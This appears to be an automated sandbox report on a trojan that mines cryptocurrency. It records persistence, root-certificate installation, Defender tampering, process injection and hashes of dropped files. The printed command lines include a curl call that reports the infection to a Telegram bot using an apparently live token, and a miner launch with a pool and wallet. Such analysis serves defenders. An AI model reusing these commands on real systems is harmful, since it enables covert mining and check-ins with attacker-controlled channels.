06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa

Analysis

max time kernel
118s
max time network
129s
platform
windows7_x64
resource
win7-en-20211104
submitted
06-12-2021 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe
Size

120KB
MD5

3850da296f3c2596aaba5dba02f0b204
SHA1

d39cb436d340ad2dc81cfeb2e2aeea21d3a22e2a
SHA256

06c45ab0b5138b4244b4c800264966ab94ee4b5e06c13b58332c2cb792ca58aa
SHA512

3b47e5e3caaf197e54179456fc61f709771cec77e642b5aab1c7d8b04c1d9161806d39d5866da9d4cfc3a72730aae3d17db640154de7cf771d8d04dfe3d73ee7

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

7z.exe7z.exe

pid process

1000 7z.exe
1980 7z.exe
Loads dropped DLL 3 IoCs

Processes:

cmd.exe7z.exe7z.exe

pid process

1536 cmd.exe
1000 7z.exe
1980 7z.exe

pid	process
1000	7z.exe
1980	7z.exe

pid	process
1536	cmd.exe
1000	7z.exe
1980	7z.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

bfsvc.exe

pid process

1652 bfsvc.exe
1652 bfsvc.exe
1652 bfsvc.exe
1652 bfsvc.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe

description pid process target process

PID 2036 set thread context of 1652 2036 SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe bfsvc.exe

pid	process
1652	bfsvc.exe
1652	bfsvc.exe
1652	bfsvc.exe
1652	bfsvc.exe

description	pid	process	target process
PID 2036 set thread context of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	1000	7z.exe
Token: 35	1000	7z.exe
Token: SeSecurityPrivilege	1000	7z.exe
Token: SeSecurityPrivilege	1000	7z.exe
Token: SeRestorePrivilege	1980	7z.exe
Token: 35	1980	7z.exe
Token: SeSecurityPrivilege	1980	7z.exe
Token: SeSecurityPrivilege	1980	7z.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.execmd.execmd.exe

description	pid	process	target process
PID 2036 wrote to memory of 668	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 668	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 668	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 1536	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 1536	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 1536	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 1536 wrote to memory of 1000	1536	cmd.exe	7z.exe
PID 1536 wrote to memory of 1000	1536	cmd.exe	7z.exe
PID 1536 wrote to memory of 1000	1536	cmd.exe	7z.exe
PID 2036 wrote to memory of 1448	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 1448	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 2036 wrote to memory of 1448	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	cmd.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	7z.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1652	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	bfsvc.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe
PID 2036 wrote to memory of 1748	2036	SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.38189010.4210.25224.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot1765686682:AAFKW2CipVCRG2oYuHNFJMKO8RSC06ZylW8/sendMessage?chat_id=-679243704&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Standard VGA Graphics Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
2⤵
PID:668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker EasyMiner_Bot -clKernel 3
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1652

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker EasyMiner_Bot -clKernel 3
2⤵
PID:1748

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
67a55e73dc3e285f5ecad2f52e4606aa

SHA1
280b8d8083aac33e1b05078bb6706f155cae47c7

SHA256
fc0e21a8e33d53a30207d3e0e3dc9079e253fc623cc4835877cbc39ca7a826a3

SHA512
e12b564cc866d3d50246c4326e0086daa3086adf8084f69c1f0fa49a091ed9a2c93ea07a2f6cc4eec30dea54492dbf12950e8e3e7f6c26208f7b57860f362efe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
1543b223f63fda679a94d034d23b27ba

SHA1
82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

SHA256
30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

SHA512
270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
9d99b4d43e4e7a0408c5fe99b4cc4afe

SHA1
702436963243f0de2d431ec29b199505a0aa3b90

SHA256
c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3

SHA512
44620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
32ab3a6509fe78d666dcafc5be73f2e1

SHA1
c16e1c2716b4ae5b9e5bfb9773d810344b539126

SHA256
dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

SHA512
c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
memory/668-55-0x0000000000000000-mapping.dmp

Download
memory/1000-59-0x0000000000000000-mapping.dmp

Download
memory/1448-64-0x0000000000000000-mapping.dmp

Download
memory/1536-57-0x0000000000000000-mapping.dmp

Download
memory/1652-89-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-93-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-71-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-72-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-73-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-74-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-76-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-77-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-79-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-80-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-81-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-83-0x000000014165D878-mapping.dmp

Download
memory/1652-82-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-101-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-95-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-96-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-97-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-90-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-92-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-98-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-99-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1652-91-0x000007FFFFBD0000-0x000007FFFFFA1000-memory.dmp

Filesize
3.8MB

Download
memory/1652-70-0x0000000140000000-0x0000000141660000-memory.dmp

Filesize
22.4MB

Download
memory/1748-88-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1748-87-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1748-86-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1748-85-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1748-94-0x0000000140000000-0x0000000140E38000-memory.dmp

Filesize
14.2MB

Download
memory/1980-65-0x0000000000000000-mapping.dmp

Download
memory/2036-56-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp

Filesize
8KB

Download